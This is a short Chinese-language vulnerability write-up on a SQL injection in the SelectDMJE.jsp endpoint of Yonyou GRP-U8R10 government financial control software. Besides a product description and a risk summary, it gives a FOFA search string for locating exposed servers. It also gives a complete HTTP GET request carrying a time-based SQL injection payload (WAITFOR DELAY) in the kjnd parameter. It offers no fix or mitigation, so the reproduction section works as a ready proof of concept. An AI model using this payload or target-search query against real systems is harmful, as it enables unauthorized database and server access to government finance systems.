0x01 产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于支持国家电子政务发展的新一代产品。基于先进的云计算技术，该软件成为我国行政事业财务领域中最专业的政府财务管理软件之一。

0x02 漏洞概述

用友GRP-U8R10行政事业内控管理软件在SelectDMJE.jsp接口存在潜在的SQL注入漏洞，未经授权的攻击者有可能利用这个漏洞获取对数据库的权限。进一步的攻击可能导致攻击者获取服务器权限，带来严重的安全风险。

0x03 影响范围

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager，产品分B、C、G三个产品系列。

0x04 复现环境

FOFA：app="用友-GRP-U8"

0x05 漏洞复现

GET /u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:2%27-- HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=13387E12A98BB3F6614C5D44EA3A5906
Upgrade-Insecure-Requests: 1